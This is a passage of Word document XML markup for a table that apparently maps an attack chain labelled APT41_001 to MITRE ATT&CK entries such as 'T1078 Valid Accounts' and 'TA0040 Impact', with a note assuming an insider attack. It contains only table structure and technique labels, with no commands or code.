          <w:p w14:paraId="75D40402" w14:textId="77777777" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61AAA7AD" w14:textId="2234607D" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r w:rsidR="00C6049F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AEF87DD" w14:textId="77777777" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="91"/>
      <w:bookmarkEnd w:id="92"/>
      <w:tr w:rsidR="000003D7" w:rsidRPr="00B857D7" w14:paraId="6A6DE9F3" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="567E2FD9" w14:textId="77777777" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41FE6FCD" w14:textId="77777777" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5913DF64" w14:textId="77777777" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="15B4FB54" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="00AC7A85" w:rsidRDefault="000003D7" w:rsidP="000003D7"/>
    <w:p w14:paraId="5B1A7625" w14:textId="77777777" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="000003D7">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408"/>
        <w:gridCol w:w="661"/>
        <w:gridCol w:w="699"/>
        <w:gridCol w:w="557"/>
        <w:gridCol w:w="992"/>
        <w:gridCol w:w="2126"/>
      </w:tblGrid>
      <w:tr w:rsidR="000003D7" w:rsidRPr="002D1D50" w14:paraId="154CB628" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="21333EDD" w14:textId="77777777" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="93" w:name="OLE_LINK1"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="45FF5A75" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="002D1D50" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="703E20DA" w14:textId="6BCCD25D" w:rsidR="000003D7" w:rsidRPr="002D1D50" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>APT</w:t>
            </w:r>
            <w:r w:rsidR="00E63DEA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>_001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1A7F500C" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="002D1D50" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="212E91C9" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="002D1D50" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="129B930E" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="002D1D50" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="75653B0D" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="002D1D50" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4797600D" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="002D1D50" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000003D7" w:rsidRPr="002D1D50" w14:paraId="5D639D9A" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AF4D16E" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="002D1D50" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D134BF1" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="002D1D50" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4855345E" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="002D1D50" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07C6CF7F" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="002D1D50" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7112EA57" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="002D1D50" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DB4F613" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="002D1D50" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22513B74" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="002D1D50" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2162910F" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="002D1D50" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000003D7" w:rsidRPr="002D1D50" w14:paraId="2D0960AA" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51A1FCC7" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="002D1D50" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E6B4458" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="002D1D50" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0429CCF2" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="002D1D50" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52A825BF" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="002D1D50" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17BCF551" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="002D1D50" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="471BF19A" w14:textId="77777777" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16107E3C" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="002D1D50" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC</w:t>
            </w:r>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11C77CBF" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="002D1D50" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000003D7" w:rsidRPr="00B857D7" w14:paraId="4187514D" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F0C03D0" w14:textId="554EBC31" w:rsidR="000003D7" w:rsidRDefault="001E0502" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AFB4F48" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="00B857D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">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8" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="661D356D" w14:textId="404277DB" w:rsidR="000003D7" w:rsidRPr="00B857D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D81EFA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D81EFA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00E63DEA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>078</w:t>
            </w:r>
            <w:r w:rsidRPr="00D81EFA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D81EFA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00E63DEA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Valid Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09978040" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="00B857D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="141FCF13" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="00B857D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2357CBBE" w14:textId="2C39D6D8" w:rsidR="000003D7" w:rsidRDefault="001E0502" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A300891" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="00B857D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-EXP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43482384" w14:textId="4DFEBA6B" w:rsidR="000003D7" w:rsidRPr="00D81EFA" w:rsidRDefault="000003D7" w:rsidP="00E63DEA">
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00E63DEA">
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">] </w:t>
            </w:r>
            <w:r w:rsidR="00E63DEA">
              <w:t>Assume Insider Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000003D7" w:rsidRPr="00B857D7" w14:paraId="0C4CDA81" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F46C259" w14:textId="54751F2D" w:rsidR="000003D7" w:rsidRPr="004F11AC" w:rsidRDefault="001E0502" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004F11AC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="589AC631" w14:textId="0767CAC7" w:rsidR="000003D7" w:rsidRPr="004F11AC" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004F11AC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004F11AC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidR="00E63DEA" w:rsidRPr="004F11AC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>040</w:t>
            </w:r>
            <w:r w:rsidRPr="004F11AC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004F11AC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> I</w:t>
            </w:r>
            <w:r w:rsidR="00E63DEA" w:rsidRPr="004F11AC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>mpact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44B23B5D" w14:textId="61E947D4" w:rsidR="000003D7" w:rsidRPr="004F11AC" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
